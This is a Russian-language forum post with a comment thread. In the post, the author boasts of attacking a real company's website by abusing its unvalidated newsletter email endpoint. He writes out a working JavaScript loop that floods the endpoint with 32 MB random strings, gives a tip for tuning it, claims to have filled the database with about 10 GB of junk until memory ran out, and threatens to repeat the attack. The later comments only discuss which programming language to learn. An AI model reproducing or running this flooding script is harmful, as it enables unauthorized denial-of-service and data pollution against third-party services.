7244

Шлём `Привет` кэшбери

Вижу пост

Не долго парясь нахожу в интернете их сайт http://gdc.group


Ооокей... Смотрим что там и как. И оказывается что фильтр почты, которую к ним на рассылку можно закинуть - фиктивный. Те если отправить руками то можно записать что угодно.


http://gdc.group/files/action/ajax.php?email=1


Методом перебора узнаём что под поле почты выделено 32милиионов(2^25) символов строка... А это 32 мегабайта.


Пишем небольшой скрипт


i=0; spam = () => { $.post('http://gdc.group/files/action/ajax.php', { email: Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('') }, (a)=>{console.log(++i, a); spam();}); }; spam();

Хотя на деле лучше степень 20 гдето, потому как на лимите там памяти не хватает.


Ну и итого всё..) Память у сервиса кончилась, удачи разрабам разгребать говно и фиксить дыры..)

Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась... Если ребутнут не пофиксив, продолжим...


Такие успешные парни, а найти разраба не из студентов не смогли =\


Теперь всегда так:

Fatal error: Allowed memory size of 268435456 bytes exhausted (tried to allocate 4304128 bytes) in /home/bitrix/ext_www/gdc.group/files/action/ajax.php on line 8

Ещё и битрикс... Фи...

Вы смотрите срез комментариев. Показать все
1
Автор поста оценил этот комментарий
@ser60v, Сергей как я понимаю?! Подскажите, ударила моча в голову тут и подумал я, а не попробовать ли мне программировать. С чего начать ? Вроде как советуют Яву, явускрипт или питон. С чего начать? Не для себя конечно, для монитизации этих будущих умений.
раскрыть ветку (8)
3
Автор поста оценил этот комментарий

Вопрос в томчто штырит...

Если ява скрипт, то это node

Питон повыше порог вхождения.

/beardeddwarf

в контач стукни могу пару советов дать, да книг, задач покидать.

1
Автор поста оценил этот комментарий

В программировании не бывает программирования "Не для себя" иначе вы никогда ничего не выучите. Современному веб-программисту знать надо такое количество знаний, что деньги, которые за них дают в радость не покажутся, если конечно вы ради денег пытаетесь начать

раскрыть ветку (6)
0
Автор поста оценил этот комментарий
Не спорю с вами. Но скажу свое мнение в дополнение. Работа должна развивать тебя, давать новые умения, знания и опыт. Я вижу в программировании кладезь для развития человека, его мозга(верю в пластичность мозга и его тренировку) Вижу свободу если мы говорим о далёких планах про фриланс, свободу места жительства семьи, имея понимание, что я буду ограничен как фрилансер(не летаю в облаках по опыту, что времени будет валом). И опять же, никто не говорит что будет легко, главное - что будет интересно.
раскрыть ветку (5)
0
Автор поста оценил этот комментарий

Ну тогда начать можно с чего угодно, язык не определяет ваши знания, зная один язык на достаточном уровне вам хватит 3-5 дней чтобы освоить другой язык. А язык собственно выбирайте из того, чем хотите заниматься. Хотите заниматься веб разработкой, нужно знать html+css, js на начальном уровне и php

Если нравятся алгоритмы, машинное обучение и все такое далекое от свистоперделок - питон.

Хочется софт писать - Java.

Да, каждый из приведенных языков может использоваться в любой другой области, но камон, ребят, используйте инструменты правильно, на питоне писать бэк - извращение, как и на js например писать софт (Electron). Главное не слушайте этих хипстеров, универсальных языков и инструментовне бывает, а если и бывают, то они слабы в областях, для которых они не предназначены

раскрыть ветку (4)
0
Автор поста оценил этот комментарий

Про sql забыли)

раскрыть ветку (3)
0
Автор поста оценил этот комментарий

SQL учится как и html с css, по ходу дела)

раскрыть ветку (2)
0
Автор поста оценил этот комментарий

А вот не сказал бы базы проектировать порой срань как муторно. Джойны нормальные писать срань как муторно итп.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Муторно, но не сложно, а на счет джоинов, в современном мире есть множество удобнейших ORM систем которые решают большинство проблем касающихся связей, да и вообще всей работы с базой. Честно, мне если два раза в месяц приходится писать запросы в базу в чистом виде, то это хорошо )

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку